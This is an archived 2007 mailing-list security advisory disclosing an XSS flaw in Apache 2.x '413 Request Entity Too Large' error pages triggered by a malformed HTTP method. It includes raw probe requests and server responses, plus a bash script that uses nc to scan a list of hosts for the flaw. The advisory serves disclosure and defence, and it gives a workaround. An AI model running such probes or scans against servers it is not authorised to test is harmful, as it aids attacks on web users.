Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] PR07-37: XSS on Apache HTTP Server 413 error pages via malfo

from [Adrian P.] Network Security [Permanent Link]
Subject: [VulnWatch] PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method
Date: Fri, 30 Nov 2007 16:15:14 +0000 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method


Vulnerability found: 7 November 2007

Vendor contacted: 14 November 2007

Risk factor: N/A

The reason why we didn't consider this vulnerability a security risk is
because the attacker needs to force the victim's browser to submit a
malformed HTTP method.

Header injection has been demonstrated to be possible using Flash [1]
[2], but might be dependent on vulnerable Flash plugins.

A relevant example published in the past is exploiting the Apache
'Expect' XSS [3] (CVE-2006-3918) using flash [4].

However, in this case we need to spoof the HTTP METHOD to a
specially-crafted value.


Description:

It is possible to cause Apache HTTP server to return client-supplied
scripting code by submitting a malformed HTTP method which would
actually carry the payload (i.e.: malicious JavaScript) and invalid
length data in the form of either of the following:

 Two 'Content-length:' headers equals to zero. i.e.: "Content-Length:
0[LF]Content-Length: 0"
 One 'Content-length:' header equals to two values. i.e.:
"Content-length: 0, 0"
 One 'Content-length:' header equals to a negative value. i.e.:
"Content-length: -1"
 One 'Content-length:' header equals to a large value. i.e.:
"Content-length: 9999999999999999999999999999999999999999999999"


Apache 2.X returns a '413 Request Entity Too Large' error, when
submitting invalid length data. When probing for XSS on the error page
returned by the server we have 3 possible string vectors:

 The 'Host:' header
 The URL
 The HTTP method

If we probe for XSS using the 'Host:' header, Apache correctly filters
the angle brackets and replaces them with HTML entities:

REQUEST:

GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]


SERVER'S REPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data
provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at &lt;badchars&gt;
Port 80</address>
</body></html>


Notice that '<BADCHARS>' gets replaced with '&lt;badchars&gt;'

If we probe for XSS using the URL, Apache ALSO correctly filters the
angle brackets and replaces them with HTML entities:

REQUEST:

GET /<BADCHARS>/ HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]


SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:41:17 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/&lt;BADCHARS&gt;/<br />
does not allow request data with GET requests, or the amount of data
provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo
Port 80</address>
</body></html>


Again, '<BADCHARS>' gets replaced with '&lt;badchars&gt;'


However, if we probe for XSS using a malformed HTTP method, the angle
brackets are NOT replaced with HTML entities:


REQUEST:

<BADCHARS> / HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]


SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:42:46 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with <BADCHARS> requests, or the amount of
data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo
Port 80</address>
</body></html>



The following script could be used to audit your network for vulnerable
web servers:

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
        echo "$0 <hosts-file>"
        exit
fi

for i in `cat $1`
do

if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
- -i '<PROCHECKUP>' > /dev/null
then
        echo "$i is VULNERABLE!"
fi

done


Vulnerability successfully tested on (banners extracted from server
headers):

Server: Apache/2.0.46 (Red Hat)
Server: Apache/2.0.51 (Fedora)
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7g
Server: Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2
Server: Apache/2.2.4 (Linux/SUSE)


Note: other versions might also be vulnerable.


Consequences:

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.
session IDs) to unauthorised third parties provided that a web browser
is tricked to submit a malformed HTTP method.


Workaround:

Disable Apache's default 413 error pages by adding a 'ErrorDocument 413'
statement to the Apache config file.


References:

http://www.procheckup.com/Vulnerability_2007.php

[1] "Forging HTTP request headers with Flash"
http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html

[2] "HTTP Header Injection Vulnerabilities in the Flash Player Plugin"
http://download2.rapid7.com/r7-0026/

[3] "Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1"
http://www.securityfocus.com/archive/1/433280

[4] "More Expect Exploitation In Flash"
http://ha.ckers.org/blog/20071103/more-expect-exploitation-in-flash/


Credits: Adrian Pastor and Amir Azam of ProCheckUp Ltd (www.procheckup.com).

Special thanks go to Amit Klein and Joe Orton for providing such
valuable feedback.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHUDcSUmN3xwbmU6YRApBiAJ4qj8fxM0aXe70OHmerS4SCxhMxjQCdETTm
mQehf2QDRpoig1kjzxdIEcU=
=qQdC
-----END PGP SIGNATURE-----
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method, Adrian P. <=
Previous by Date:  [VulnWatch] PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script, Adrian P.
Next by Date:  [VulnWatch] PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection, Adrian P.
Previous by Thread:  [VulnWatch] PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script, Adrian P.
Next by Thread:  [VulnWatch] PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection, Adrian P.
Indexes:  [Date] [Thread] [Top] [All Lists]